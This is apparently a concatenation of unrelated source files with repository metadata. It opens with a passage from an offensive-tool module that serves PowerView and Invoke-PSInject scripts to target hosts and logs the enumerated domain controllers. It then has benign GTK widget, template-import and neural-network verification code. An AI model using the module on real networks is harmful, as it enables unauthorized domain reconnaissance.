if 'Invoke-PSInject.ps1' == request.path[1:]:
request.send_response(200)
request.end_headers()
request.wfile.write(self.ps_script1)
elif 'PowerView.ps1' == request.path[1:]:
request.send_response(200)
request.end_headers()
request.wfile.write(self.ps_script2)
else:
request.send_response(404)
request.end_headers()
def on_response(self, context, response):
response.send_response(200)
response.end_headers()
length = int(response.headers.get('content-length'))
data = response.rfile.read(length).decode()
#We've received the response, stop tracking this host
response.stop_tracking_host()
dc_count = 0
if len(data):
buf = StringIO(data).readlines()
for line in buf:
if line != '\r\n' and not line.startswith('Name') and not line.startswith('---'):
try:
hostname, domain, ip = filter(None, line.strip().split(' '))
hostname = hostname.split('.')[0].upper()
domain = domain.split('.')[0].upper()
context.log.highlight('Hostname: {} Domain: {} IP: {}'.format(hostname, domain, ip))
context.db.add_computer(ip, hostname, domain, '', dc=True)
dc_count += 1
except Exception:
context.log.error('Error parsing Domain Controller entry')
context.log.success('Added {} Domain Controllers to the database'.format(highlight(dc_count)))
log_name = 'Get_NetDomainController-{}-{}.log'.format(response.client_address[0], datetime.now().strftime("%Y-%m-%d_%H%M%S"))
write_log(data, log_name)
context.log.info("Saved raw output to {}".format(log_name)) |
codigo/Live177/aa.py | BrunoPontesLira/live-de-python | 572 | 11156754 | <gh_stars>100-1000
from pprint import pprint
pprint('Eduardo')
|
src/gtk/toga_gtk/widgets/internal/buttons/refresh.py | freespace/toga | 1,261 | 11156793 | from toga_gtk.libs import Gtk
from .base import ParentPosition
class RefreshButtonWidget(Gtk.Revealer):
def __init__(self, position: Gtk.Align, margin: int, *args, **kwargs):
super().__init__(*args, **kwargs)
self.parent = None
self.refresh_btn = Gtk.Button.new_from_icon_name(
"view-refresh-symbolic", Gtk.IconSize.BUTTON
)
self.refresh_btn.set_can_focus(False)
refresh_btn_context = self.refresh_btn.get_style_context()
refresh_btn_context.add_class("osd")
refresh_btn_context.add_class("toga-detailed-list-floating-buttons")
refresh_btn_context.remove_class("button")
self.close_btn = Gtk.Button.new_from_icon_name(
"close-symbolic", Gtk.IconSize.BUTTON
)
self.close_btn.set_can_focus(False)
close_btn_context = self.close_btn.get_style_context()
close_btn_context.add_class("osd")
close_btn_context.add_class("toga-detailed-list-floating-buttons")
self.hbox = Gtk.HBox()
self.hbox.add(self.refresh_btn)
self.hbox.add(self.close_btn)
self.set_transition_type(Gtk.RevealerTransitionType.CROSSFADE)
self.set_valign(position)
self.set_halign(Gtk.Align.CENTER)
self.set_margin_top(margin)
self.set_margin_bottom(margin)
self.set_reveal_child(False)
self.add(self.hbox)
def set_on_refresh(self, gtk_on_refresh: callable):
self.refresh_btn.connect(
"clicked",
gtk_on_refresh)
def set_on_close(self, gtk_on_close: callable):
self.close_btn.connect(
"clicked",
gtk_on_close)
def show(self):
self.set_reveal_child(True)
def hide(self):
self.refresh_btn.hide()
self.close_btn.hide()
self.set_reveal_child(False)
def show_close(self):
return self.close_btn.show_now()
def hide_close(self):
return self.close_btn.hide()
def show_refresh(self):
return self.refresh_btn.show_now()
def is_visible(self):
return self.get_reveal_child()
class RefreshButton(ParentPosition):
"""
Shows a refresh button at the top of a list when the user is at the bottom of the list.
Shows a refresh button at the bottom of a list when the user is at the top of the list.
When there is not enough content to scroll, show the button at the bottom and have a side
button to move it to the top. After moving the button to the top, show a button to move it
to the bottom.
Example:
-------------
| Refresh | X |
-------------
"""
def __init__(self, adj: Gtk.Adjustment, margin=12, *args, **kwargs):
super().__init__(adj, *args, **kwargs)
self.margin = margin
self._parent = None
self.on_refresh = None
self.button_top = RefreshButtonWidget(Gtk.Align.START, self.margin)
self.button_top.set_on_refresh(self.gtk_on_refresh_clicked)
self.button_top.set_on_close(self.gtk_on_close_clicked)
self.button_bottom = RefreshButtonWidget(Gtk.Align.END, self.margin)
self.button_bottom.set_on_refresh(self.gtk_on_refresh_clicked)
self.button_bottom.set_on_close(self.gtk_on_close_clicked)
self.gtk_adj_handler = self.adj.connect(
"value-changed",
self.gtk_on_value_changed)
def overlay_over(self, parent):
self._parent = parent
self.list_changed()
parent.add_overlay(self.button_top)
parent.add_overlay(self.button_bottom)
def destroy(self, *args, **kwargs):
self.adj.disconnect(self.gtk_adj_handler)
self.button_top.destroy()
self.button_bottom.destroy()
return super().destroy(*args, **kwargs)
def set_on_refresh(self, on_refresh: callable):
self.on_refresh = on_refresh
def gtk_on_value_changed(self, adj: Gtk.Adjustment):
self.list_changed()
def gtk_on_refresh_clicked(self, w: Gtk.Button):
if self.on_refresh is not None:
self.on_refresh()
def gtk_on_close_clicked(self, w: Gtk.Button):
is_top_visible = self.button_top.is_visible()
is_bottom_visible = self.button_bottom.is_visible()
if not is_top_visible:
self._show_top_full()
if not is_bottom_visible:
self._show_bottom_full()
def _hide_all(self):
self.button_top.hide()
self.button_bottom.hide()
def _show_top_full(self):
self._hide_all()
self.button_top.show()
self.button_top.show_close()
self.button_top.show_refresh()
def _show_top_refresh(self):
self._hide_all()
self.button_top.show()
self.button_top.hide_close()
self.button_top.show_refresh()
def _show_bottom_full(self):
self._hide_all()
self.button_bottom.show()
self.button_bottom.show_close()
self.button_bottom.show_refresh()
def _show_bottom_refresh(self):
self._hide_all()
self.button_bottom.show()
self.button_bottom.show_refresh()
self.button_bottom.hide_close()
def _show_both_full(self):
self._hide_all()
self._show_bottom_full()
def list_changed(self):
if self.on_refresh is None:
self._hide_all()
return
is_scrollable = self.is_parent_scrollable()
is_at_top = self.is_parent_at_top()
is_at_bottom = self.is_parent_at_bottom()
if not is_scrollable:
self._show_both_full()
return
if is_at_top:
self._show_bottom_refresh()
return
if is_at_bottom:
self._show_top_refresh()
return
if not is_at_top and not is_at_bottom:
self._hide_all()
return
|
gcloud/template_base/domains/importer.py | DomineCore/bk-sops | 881 | 11156825 | <reponame>DomineCore/bk-sops
# -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making 蓝鲸智云PaaS平台社区版 (BlueKing PaaS Community
Edition) available.
Copyright (C) 2017-2021 THL A29 Limited, a Tencent company. All rights reserved.
Licensed under the MIT License (the "License"); you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://opensource.org/licenses/MIT
Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on
an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
specific lan
"""
from django.db import transaction
from .template_manager import TemplateManager
class TemplateImporter:
def __init__(self, template_model_cls):
self.template_model_cls = template_model_cls
def import_template(self, operator: str, template_data: list) -> dict:
"""
以 operator 的身份来导入若干个模板
:param operator: 操作者
:type operator: str
:param template_data: [
{
"override_template_id": "要覆盖的模板的主键ID",
"name": "模板名",
"pipeline_tree": "dict, 模板 pipeline tree",
"description": "模板描述",
"template_kwargs": "dict, 模板创建关键字参数",
"id": "str, 模板临时唯一 ID"
}
]
:type template_data: list
:return: [description]
:rtype: dict
"""
manager = TemplateManager(template_model_cls=self.template_model_cls)
import_result = []
pipeline_id_map = {}
with transaction.atomic():
for td in template_data:
override_template_id = td["override_template_id"]
name = td["name"]
pipeline_tree = td["pipeline_tree"]
description = td["description"]
replace_result = self._replace_subprocess_template_id(pipeline_tree, pipeline_id_map)
if not replace_result["result"]:
import_result.append(replace_result)
continue
if not override_template_id:
create_result = manager.create(
name=name,
creator=operator,
pipeline_tree=pipeline_tree,
template_kwargs=td["template_kwargs"],
description=description,
)
if create_result["result"]:
pipeline_id_map[td["id"]] = create_result["data"].id
import_result.append(create_result)
else:
template = self.template_model_cls.objects.get(id=override_template_id)
update_result = manager.update(
template=template,
editor=operator,
name=name,
pipeline_tree=pipeline_tree,
description=description,
)
if update_result["result"]:
pipeline_id_map[td["id"]] = update_result["data"].id
import_result.append(update_result)
return {"result": True, "data": import_result, "message": "success", "verbose_message": "success"}
def _replace_subprocess_template_id(self, pipeline_tree: dict, pipeline_id_map: dict) -> dict:
"""
将模板数据中临时的模板 ID 替换成数据库中模型的主键 ID
:param pipeline_tree: pipeline tree 模板数据
:type pipeline_tree: dict
:param pipeline_id_map: Subprocess 节点中临时 ID 到数据库模型主键 ID 的映射
:type pipeline_id_map: dict
"""
if not pipeline_id_map:
return {
"result": True,
"data": None,
"message": "pipeline_id_map is empty",
"verbose_message": "pipeline_id_map is empty",
}
for act in pipeline_tree["activities"].values():
if act["type"] == "SubProcess":
if act["template_id"] not in pipeline_id_map:
return {
"result": False,
"data": None,
"message": "can not find {} in pipeline_id_map".format(act["template_id"]),
"verbose_message": "can not find {} in pipeline_id_map: {}".format(
act["template_id"], pipeline_id_map
),
}
act["template_id"] = pipeline_id_map[act["template_id"]]
return {
"result": True,
"data": None,
"message": "success",
"verbose_message": "success",
}
|
jax_verify/src/nonconvex/duals.py | lberrada/jax_verify | 109 | 11156834 | # coding=utf-8
# Copyright 2021 The jax_verify Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Implement the dual computations for the NonConvex Reformulation."""
import collections
import functools
from typing import Callable, Dict, Tuple, Union, List, DefaultDict, Optional
import jax
import jax.numpy as jnp
from jax_verify.src import bound_propagation
from jax_verify.src import synthetic_primitives
from jax_verify.src.nonconvex import nonconvex
Tensor = jnp.ndarray
Index = bound_propagation.Index
ParamSet = nonconvex.ParamSet
EvalFunArgs = [ParamSet, ParamSet, ParamSet]
WolfeDualFn = Callable[[ParamSet, Tensor, ParamSet, Tensor, Tensor, ParamSet],
Tensor]
LagrangianLevelFn = Callable[[Tensor, ParamSet], Tensor]
LagrangianBoundingFn = Callable[[Tensor, ParamSet], Tensor]
LagrangianVarTerm = Tuple[str, Callable[..., Tensor]]
LagrangianDict = DefaultDict[Index, List[LagrangianVarTerm]]
LagrangianVartermsFn = Callable[[Tensor, LagrangianDict], None]
def _sum_fn(fn, *args, **kwargs):
out = fn(*args, **kwargs)
summand = out[0] if isinstance(out, tuple) else out
return summand.sum(), out
def _sum_over_acts(var: Tensor) -> Tensor:
return var.sum(axis=tuple(range(1, var.ndim)))
CVX_HULL_PRIMITIVES = (synthetic_primitives.relu_p,
synthetic_primitives.softplus_p,
synthetic_primitives.posbilinear_p,
)
class WolfeNonConvexBound(nonconvex.ConstrainedNonConvexBound):
"""This subclass allows the computation of the WolfeDual.
This is done through the `wolfe_dual_fn`, which propagates the dual variables
backwards. The quantity propagated backwards (dvar) needs to
be split between pos_dvar (dual variable on [lb_fun() - z]) and
neg_dvar (dual variable on [z - ub_fun()]).
In the presence of imposed (concrete) constraints, those need to be specified
differently. We need:
(bound_posdvar - bound_negdvar) + (boundfun_posdvar - boundfun_negdvar)
= dvar_cte + sum_{j>i} (boundfun_posdvar_j * lb_fun()
- boundfun_negdvar_j * ub_fun())
which means that we have degrees of freedom.
Current implementation decides based on a greedy approach, ignoring the
downstream consequences. This could be improved.
"""
def __init__(
self,
wolfe_dual_fn: WolfeDualFn,
index: Index,
shape: Tuple[int, ...],
previous_bounds: Dict[Index, 'WolfeNonConvexBound'],
eval_fn: Callable[EvalFunArgs, Tensor],
variables: Dict[Index, Tuple[int, ...]],
concretized_bounds: Optional[bound_propagation.Bound] = None):
"""Create a NonConvexBound that can compute the WolfeDual.
Args:
wolfe_dual_fn: Function performing backward propagation of bounds for the
wolfe dual and computing the contribution of this layer to the dual.
index: Unique index representing the position of this activation in the
computation graph.
shape: Shape of the activations that this bound represent.
previous_bounds: Dict mapping index of activation to the bound
representing it. We need it to be able to obtain the contributions of
previous layers to the Lagrangian.
eval_fn: Function to evaluate the bound computation problem in the primal
variables: Dict mapping index of activation to the shape of variables
required to optimize them.
concretized_bounds: (Optional) Precomputed bounds for this NonConvexBound.
"""
super().__init__(index, shape, previous_bounds,
eval_fn, variables, concretized_bounds)
self.wolfe_dual_fn = wolfe_dual_fn
def dual(self, var_set: ParamSet, objectives: ParamSet
) -> Tuple[Tensor, Tensor]:
dual_vars, acts = self._compute_dualvars_convexgrad(var_set, objectives)
primal = self._objective_fn(acts, objectives)
dual_gap = 0
index_bound_list = list(self.previous_bounds.items())
for index, intermediate_bound in reversed(index_bound_list):
wolfe_dual_fn = intermediate_bound.wolfe_dual_fn
if intermediate_bound.is_constrained():
wolfe_dual_contrib = wolfe_dual_fn(
var_set, dual_vars[index], acts,
intermediate_bound.lower, intermediate_bound.upper, dual_vars)
else:
wolfe_dual_contrib = wolfe_dual_fn(
var_set, dual_vars[index], acts, None, None, dual_vars)
dual_gap = dual_gap + wolfe_dual_contrib
wolfe_dual = primal + dual_gap
return primal, wolfe_dual
@classmethod
def get_initial_bound_constructor(
cls: Callable[..., 'WolfeNonConvexBound'],
index: Index,
lb: Tensor,
ub: Tensor) -> Callable[..., 'WolfeNonConvexBound']:
def wolfe_dual_fn(var_set: ParamSet,
dvar: Tensor,
acts: ParamSet,
bound_lb: Tensor, bound_ub: Tensor,
dual_vars: ParamSet) -> Tensor:
del var_set
del bound_lb
del bound_ub
del dual_vars
pos_dvar = jnp.maximum(dvar, 0.)
neg_dvar = jnp.maximum(-dvar, 0.)
x_0 = acts[index]
dual_contrib = _sum_over_acts(pos_dvar * (lb - x_0)
+ neg_dvar * (x_0 - ub))
return dual_contrib
return functools.partial(cls, wolfe_dual_fn)
@classmethod
def get_linear_activation_constructor(
cls: Callable[..., 'WolfeNonConvexBound'],
index: Index,
vlin_fun: Callable[..., Tensor],
in_vals: List[Union['WolfeNonConvexBound', Tensor]],
) -> Callable[..., 'WolfeNonConvexBound']:
def wolfe_dual_fn(var_set: ParamSet,
dvar: Tensor,
acts: ParamSet,
bound_lb: Tensor, bound_ub: Tensor,
dual_vars: ParamSet) -> Tensor:
pos_dvar = jnp.maximum(dvar, 0.)
neg_dvar = jnp.maximum(-dvar, 0.)
all_inps = [nonconvex.eval_if_nonconvexbound(inp, var_set, None, acts)
for inp in in_vals]
if bound_lb is not None:
bound_fun_eval = vlin_fun(all_inps)
brd_bound_lb = jnp.expand_dims(bound_lb, 0)
brd_bound_ub = jnp.expand_dims(bound_ub, 0)
bound_posdvar = jnp.where(brd_bound_lb >= bound_fun_eval,
pos_dvar, jnp.zeros_like(pos_dvar))
pos_dvar = pos_dvar - bound_posdvar
bound_negdvar = jnp.where(brd_bound_ub <= bound_fun_eval,
neg_dvar, jnp.zeros_like(neg_dvar))
neg_dvar = neg_dvar - bound_negdvar
_, backprop = jax.vjp(vlin_fun, all_inps)
all_pp_dvars = backprop(pos_dvar)[0]
all_nq_dvars = backprop(neg_dvar)[0]
for i, inp_i in enumerate(in_vals):
if not isinstance(inp_i, nonconvex.NonConvexBound):
continue
prev_dvar = all_pp_dvars[i] - all_nq_dvars[i]
if inp_i.index in dual_vars:
prev_dvar = dual_vars[inp_i.index] + prev_dvar
dual_vars[inp_i.index] = prev_dvar
if bound_lb is not None:
act_out_eval = acts[index]
bound_fun_to_out = bound_fun_eval - act_out_eval
dual_contrib = _sum_over_acts(
jnp.where(bound_posdvar > 0,
bound_posdvar * (brd_bound_lb - act_out_eval),
jnp.zeros_like(bound_posdvar))
+ jnp.where(bound_negdvar > 0,
bound_negdvar * (act_out_eval - brd_bound_ub),
jnp.zeros_like(bound_negdvar))
+ (pos_dvar - neg_dvar) * bound_fun_to_out)
return dual_contrib
else:
# There shouldn't be a contrib term here; everything cancels out.
return 0
return functools.partial(cls, wolfe_dual_fn)
@classmethod
def get_nonlinearity_activation_constructor(
cls: Callable[..., 'WolfeNonConvexBound'],
index: Index,
act_type: str,
lb_fun: Callable[[Tensor], Tensor],
ub_fun: Callable[[Tensor], Tensor],
*inp: 'WolfeNonConvexBound',
) -> Callable[..., 'WolfeNonConvexBound']:
def wolfe_dual_fn(var_set: ParamSet,
dvar: Tensor,
acts: ParamSet,
bound_lb: Tensor, bound_ub: Tensor,
dual_vars: ParamSet) -> Tensor:
pos_dvar = jnp.maximum(dvar, 0.)
neg_dvar = jnp.maximum(-dvar, 0.)
inp_val = [inp_i.evaluate(var_set, {}, acts) for inp_i in inp]
lb_val, lb_backprop = jax.vjp(lb_fun, *inp_val)
ub_val, ub_backprop = jax.vjp(ub_fun, *inp_val)
if bound_lb is not None:
brd_bound_lb = jnp.expand_dims(bound_lb, 0)
brd_bound_ub = jnp.expand_dims(bound_ub, 0)
bound_posdvar = jnp.where(brd_bound_lb >= lb_val,
pos_dvar, jnp.zeros_like(pos_dvar))
pos_dvar = pos_dvar - bound_posdvar
bound_negdvar = jnp.where(brd_bound_ub <= ub_val,
neg_dvar, jnp.zeros_like(neg_dvar))
neg_dvar = neg_dvar - bound_negdvar
backprop_pos = lb_backprop(pos_dvar)
backprop_neg = ub_backprop(neg_dvar)
for (i, inp_i) in enumerate(inp):
prev_dvar = backprop_pos[i] - backprop_neg[i]
if inp_i.index in dual_vars:
prev_dvar = dual_vars[inp_i.index] + prev_dvar
dual_vars[inp_i.index] = prev_dvar
out_val = acts[index]
dual_contrib = _sum_over_acts(neg_dvar * (out_val - ub_val)
+ pos_dvar * (lb_val - out_val))
if bound_lb is not None:
dual_contrib = dual_contrib + _sum_over_acts(
jnp.where(bound_posdvar > 0,
bound_posdvar * (brd_bound_lb - out_val),
jnp.zeros_like(bound_posdvar))
+ jnp.where(bound_negdvar > 0,
bound_negdvar * (out_val - brd_bound_ub),
jnp.zeros_like(bound_negdvar)))
return dual_contrib
return functools.partial(cls, wolfe_dual_fn)
def requires_concretizing(self, consuming_primitive):
needs_concretizing = (consuming_primitive is None
or consuming_primitive in CVX_HULL_PRIMITIVES)
return (self._concretized_bounds is None) and needs_concretizing
def _initial_lagrangian_term(dvar: Tensor, lb: Tensor, ub: Tensor, x: Tensor
) -> Tensor:
pos_dvar = jnp.maximum(dvar, 0.)
neg_dvar = jnp.maximum(-dvar, 0.)
dual_contrib = (neg_dvar * (x - ub) + pos_dvar * (lb - x))
return dual_contrib
class LinLagrangianNonConvexBound(nonconvex.NonConvexBound):
"""This subclass allows the computation of the Linearized Lagrangian dual.
The lagrangian and its linearization are obtained through the
`lagrangian_level_fn` which compute the contribution of this layer to the
lagrangian, based on precomputed activation.
The minimization of linear function (such as the linearized lagrangian) over
the feasible domain is done through the `bounding_fn` function.
"""
def __init__(self,
lagrangian_level_fn: LagrangianLevelFn,
bounding_fn: LagrangianBoundingFn,
index: Index,
shape: Tuple[int, ...],
previous_bounds: Dict[Index, 'LinLagrangianNonConvexBound'],
eval_fn: Callable[EvalFunArgs, Tensor],
variables: Dict[Index, Tuple[int, ...]],
concretized_bounds: Optional[bound_propagation.Bound] = None):
"""Create a NonConvexBound that can compute the Linearized Lagrangian dual.
Args:
lagrangian_level_fn: Function returning the contribution of this layer to
the lagrangian, based on precomputed activations.
bounding_fn: Function to perform linear minimization over the domain of
an activation.
index: Unique index representing the position of this activation in the
computation graph.
shape: Shape of the activations that this bound represent.
previous_bounds: Dict mapping index of activation to the bound
representing it. We need it to be able to obtain the contributions of
previous layers to the Lagrangian.
eval_fn: Function to evaluate the bound computation problem in the primal
variables: Dict mapping index of activation to the shape of variables
required to optimize them.
concretized_bounds: (Optional) Precomputed bounds for this NonConvexBound.
"""
super(LinLagrangianNonConvexBound, self).__init__(
index, shape, previous_bounds, eval_fn,
variables, concretized_bounds)
self.lagrangian_level_fn = lagrangian_level_fn
self.bounding_fn = bounding_fn
def lagrangian(acts: ParamSet,
objectives: ParamSet,
dual_vars: Tensor,
) -> Tuple[Tensor, ParamSet]:
primals = self._objective_fn(acts, objectives)
lagrangian = primals
for index, intermediate_bound in self.previous_bounds.items():
lagrangian_level_fn = intermediate_bound.lagrangian_level_fn
dvar = dual_vars[index]
contrib = lagrangian_level_fn(dvar, acts)
lagrangian += contrib
return lagrangian, primals
self._lagrangian_fn = lagrangian
self._lagrangian_sumfn = functools.partial(_sum_fn, lagrangian)
def dual(self, var_set: ParamSet, objectives: ParamSet) -> Tensor:
dual_vars, acts = self._compute_dualvars_nonconvexgrad(var_set, objectives)
# Compute the gradients of all the lagrangians (done by taking their sum),
# with regards to the activations.
lag_grad_fun = jax.value_and_grad(self._lagrangian_sumfn, argnums=0,
has_aux=True)
((_, (lagrangians, primals)),
laggrad_wrt_acts) = lag_grad_fun(acts, objectives, dual_vars)
lin_duals = lagrangians
for index, intermediate_bound in self.previous_bounds.items():
bounding_fn = intermediate_bound.bounding_fn
lag_grad = laggrad_wrt_acts[index]
contrib = bounding_fn(lag_grad, acts)
lin_duals += contrib
return primals, lin_duals
@classmethod
def get_initial_bound_constructor(
cls: Callable[..., 'LinLagrangianNonConvexBound'],
index: Index,
lb: Tensor,
ub: Tensor) -> Callable[..., 'LinLagrangianNonConvexBound']:
def lagrangian_level_fn(dvar: Tensor, acts: ParamSet) -> Tensor:
x_0 = acts[index]
dual_contrib = _sum_over_acts(_initial_lagrangian_term(dvar, lb, ub, x_0))
return dual_contrib
def bounding_fn(lag_grad: Tensor, acts: ParamSet) -> Tensor:
x_0 = acts[index]
bound_contrib = _sum_over_acts(jnp.maximum(lag_grad, 0.) * (lb - x_0) +
jnp.minimum(lag_grad, 0.) * (ub - x_0))
return bound_contrib
return functools.partial(cls, lagrangian_level_fn, bounding_fn)
@classmethod
def get_linear_activation_constructor(
cls: Callable[..., 'LinLagrangianNonConvexBound'],
index: Index,
vlin_fun: Callable[..., Tensor],
in_vals: Tuple[Union['LinLagrangianNonConvexBound', Tensor], ...]
) -> Callable[..., 'LinLagrangianNonConvexBound']:
def lagrangian_level_fn(dvar: Tensor, acts: ParamSet) -> Tensor:
act_inp_eval = [
acts[inp.index] if isinstance(inp, nonconvex.NonConvexBound) else inp
for inp in in_vals]
# Because this is linear, the function is both the lower bound and the
# upper bound.
act_out_eval = acts[index]
f_inp_eval = vlin_fun(act_inp_eval)
dual_contrib = _sum_over_acts(dvar * (f_inp_eval - act_out_eval))
return dual_contrib
def bounding_fn(lag_grad: Tensor, acts: ParamSet) -> Tensor:
act_out_eval = acts[index]
# We need to minimize the dotproduct between the lagrangian and the output
# of that linear layer. Let's take the gradient (because everything is
# linear and then we can simply assign bounds based on sign of gradient
# coefficients.)
dot_lagrangian_output = lambda x: (lag_grad * vlin_fun(x)).sum()
act_inp_eval = [
acts[inp.index] if isinstance(inp, nonconvex.NonConvexBound) else inp
for inp in in_vals]
minimizing_inps = []
grads = jax.grad(dot_lagrangian_output)(act_inp_eval)
for inp, grad in zip(in_vals, grads):
if isinstance(inp, nonconvex.NonConvexBound):
broad_lb = jnp.expand_dims(inp.lower, 0)
broad_ub = jnp.expand_dims(inp.upper, 0)
minimizing_inps.append(jnp.where(grad >= 0, broad_lb, broad_ub))
else:
minimizing_inps.append(inp)
bound_contrib = _sum_over_acts((vlin_fun(minimizing_inps) - act_out_eval)
* lag_grad)
return bound_contrib
return functools.partial(cls, lagrangian_level_fn, bounding_fn)
@classmethod
def get_nonlinearity_activation_constructor(
cls: Callable[..., 'LinLagrangianNonConvexBound'],
index: Index,
act_type: str,
lb_fun: Callable[[Tensor], Tensor],
ub_fun: Callable[[Tensor], Tensor],
*inp: 'LinLagrangianNonConvexBound',
) -> Callable[..., 'LinLagrangianNonConvexBound']:
assert len(inp) == 1
assert act_type == 'Softplus' or act_type == 'ReLU'
inp = inp[0]
def lagrangian_level_fn(dvar: Tensor, acts: ParamSet) -> Tensor:
pos_dvar = jnp.maximum(dvar, 0.)
neg_dvar = jnp.maximum(-dvar, 0.)
act_inp_eval = acts[inp.index]
act_out_eval = acts[index]
lb_val = lb_fun(act_inp_eval)
ub_val = ub_fun(act_inp_eval)
dual_contrib = _sum_over_acts(neg_dvar * (act_out_eval - ub_val)
+ pos_dvar * (lb_val - act_out_eval))
return dual_contrib
# We consider convex monotonous activation functions, so
# - The lower bound is exact.
# - The lower/upper bound on the output can be obtained by forwarding
# through the exact function the lower/upper bound on the input.
out_lb = lb_fun(inp.lower)
out_ub = lb_fun(inp.upper)
def bounding_fn(lag_grad: Tensor, acts: ParamSet) -> Tensor:
act_out_eval = acts[index]
lb_val = jnp.expand_dims(out_lb, 0)
ub_val = jnp.expand_dims(out_ub, 0)
bound_contrib = _sum_over_acts(
jnp.maximum(lag_grad, 0.) * (lb_val - act_out_eval)
+ jnp.minimum(lag_grad, 0.) * (ub_val - act_out_eval))
return bound_contrib
return functools.partial(cls, lagrangian_level_fn, bounding_fn)
def requires_concretizing(self, consuming_primitive):
return self._concretized_bounds is None
class MinLagrangianNonConvexBound(nonconvex.NonConvexBound):
"""This subclass allows the computation of the primal minimized lagrangian.
The contribution of each primal variables are collected by the
`lagrangian_varterms_fn`. It does not directly compute the lagrangian but
fills in a dictionary mapping variables to the terms that involve them.
This is done so that we can reorganize the lagrangian per variable, and then
minimize it one variable at a time.
"""
def __init__(self,
lagrangian_varterms_fn: LagrangianVartermsFn,
index: Index,
shape: Tuple[int, ...],
previous_bounds: Dict[Index, 'MinLagrangianNonConvexBound'],
eval_fn: Callable[EvalFunArgs, Tensor],
variables: Dict[Index, Tuple[int, ...]],
concretized_bounds: Optional[bound_propagation.Bound] = None):
"""Create a NonConvexBound that can compute the primal minimized Lagrangian.
Args:
lagrangian_varterms_fn: Function filling in a dictionary mapping each
variable to the terms involving it in the lagrangian.
index: Unique index representing the position of this activation in the
computation graph.
shape: Shape of the activations that this bound represent.
previous_bounds: Dict mapping index of activation to the bound
representing it. We need it to be able to obtain the contributions of
previous layers to the Lagrangian.
eval_fn: Function to evaluate the bound computation problem in the primal
variables: Dict mapping index of activation to the shape of variables
required to optimize them.
concretized_bounds: (Optional) Precomputed bounds for this NonConvexBound.
"""
super(MinLagrangianNonConvexBound, self).__init__(
index, shape, previous_bounds, eval_fn, variables, concretized_bounds)
self.lagrangian_varterms_fn = lagrangian_varterms_fn
def collect_lagrangian_varterms(self,
objectives: ParamSet,
dual_vars: ParamSet) -> LagrangianDict:
lagrangian_dict = collections.defaultdict(list)
for index, intermediate_bound in self.previous_bounds.items():
lagrangian_varterms_fn = intermediate_bound.lagrangian_varterms_fn
dvar = dual_vars[index]
lagrangian_varterms_fn(dvar, lagrangian_dict)
return lagrangian_dict
def dual(self, var_set: ParamSet, objectives: ParamSet) -> Tensor:
dual_vars, acts = self._compute_dualvars_nonconvexgrad(var_set, objectives)
nb_targets = objectives[self.index].shape[0]
# Compute the primals. This is not based on the activation minimizing the
# lagrangian (because those are not necessarily primal feasible)
primals = self._objective_fn(acts, objectives)
lagrangian_terms = self.collect_lagrangian_varterms(objectives, dual_vars)
# For each item in the network, we have a list of all the terms it is
# involved in. Let's use this to minimize the lagrangian.
opt_acts = {}
for index, lag_terms in lagrangian_terms.items():
intermediate_bound = self.previous_bounds[index]
broad_lb = jnp.repeat(jnp.expand_dims(intermediate_bound.lower, axis=0),
nb_targets, axis=0)
broad_ub = jnp.repeat(jnp.expand_dims(intermediate_bound.upper, axis=0),
nb_targets, axis=0)
opt_acts[index] = _optimize_lagrangian_terms(lag_terms,
broad_lb, broad_ub)
minimized_lagrangian = self._objective_fn(opt_acts, objectives)
for index, lag_terms in lagrangian_terms.items():
for term in lag_terms:
out_term = term[1](opt_acts[index])
minimized_lagrangian = minimized_lagrangian + _sum_over_acts(out_term)
return primals, minimized_lagrangian
@classmethod
def get_initial_bound_constructor(
cls: Callable[..., 'MinLagrangianNonConvexBound'],
index: Index,
lb: Tensor,
ub: Tensor) -> Callable[..., 'MinLagrangianNonConvexBound']:
def lagrangian_varterms_fn(dvar: Tensor, lagrangian_dict: LagrangianDict):
lagrangian_dict[index].append(
('Linear', functools.partial(_initial_lagrangian_term, dvar, lb, ub)))
return functools.partial(cls, lagrangian_varterms_fn)
@classmethod
def get_linear_activation_constructor(
cls: Callable[..., 'MinLagrangianNonConvexBound'],
index: Index,
vlin_fun: Callable[..., Tensor],
in_vals: List[Union['MinLagrangianNonConvexBound', Tensor]],
) -> Callable[..., 'MinLagrangianNonConvexBound']:
def lagrangian_varterms_fn(dvar: Tensor, lagrangian_dict: LagrangianDict):
# There is a linear term of dvar over the outputs.
lagrangian_dict[index].append(('Linear', lambda x: (-dvar*x)))
# If only one of the input is a variable, we can do things in a simple
# way. Special casing this pattern avoids a bunch of failures on TPUs.
inp_is_bound = list(isinstance(inp, nonconvex.NonConvexBound)
for inp in in_vals)
if sum(inp_is_bound) == 1:
bound_arg_pos = inp_is_bound.index(True)
# The linear function has only one input, so we can just use it
# directly.
def single_input_vlin_fun(x):
inps = [inp if not is_bound else x
for inp, is_bound in zip(in_vals, inp_is_bound)]
return dvar * vlin_fun(inps)
lagrangian_dict[in_vals[bound_arg_pos].index].append(
('Linear', single_input_vlin_fun))
else:
# There is multiple inputs, so we need to separate the contribution of
# each one, and assign the bias to one of them.
inps = []
for inp in in_vals:
if isinstance(inp, nonconvex.NonConvexBound):
# Add the opt dimension, and put in all the examples to 0, so that
# we can identify the bias term.
shape = inp.shape
inp_shape = (dvar.shape[0],) + shape
example_inp = jnp.zeros(inp_shape)
inps.append(example_inp)
else:
inps.append(inp)
# Get the linear term over the inputs through auto-diff
def lag_inp_contrib(x):
contrib = dvar * vlin_fun(x)
contrib = _sum_over_acts(contrib)
return contrib.sum(), contrib
(_, bias), grads = jax.value_and_grad(lag_inp_contrib,
has_aux=True)(inps)
grad_dot_prod = lambda grad, bias, x: _sum_over_acts(grad * x) + bias
for inp, grad in zip(in_vals, grads):
if isinstance(inp, nonconvex.NonConvexBound):
lagrangian_dict[inp.index].append(
('Linear', functools.partial(grad_dot_prod, grad, bias)))
# Zero out the bias now that it has been included in one term.
bias = 0. * bias
return functools.partial(cls, lagrangian_varterms_fn)
@classmethod
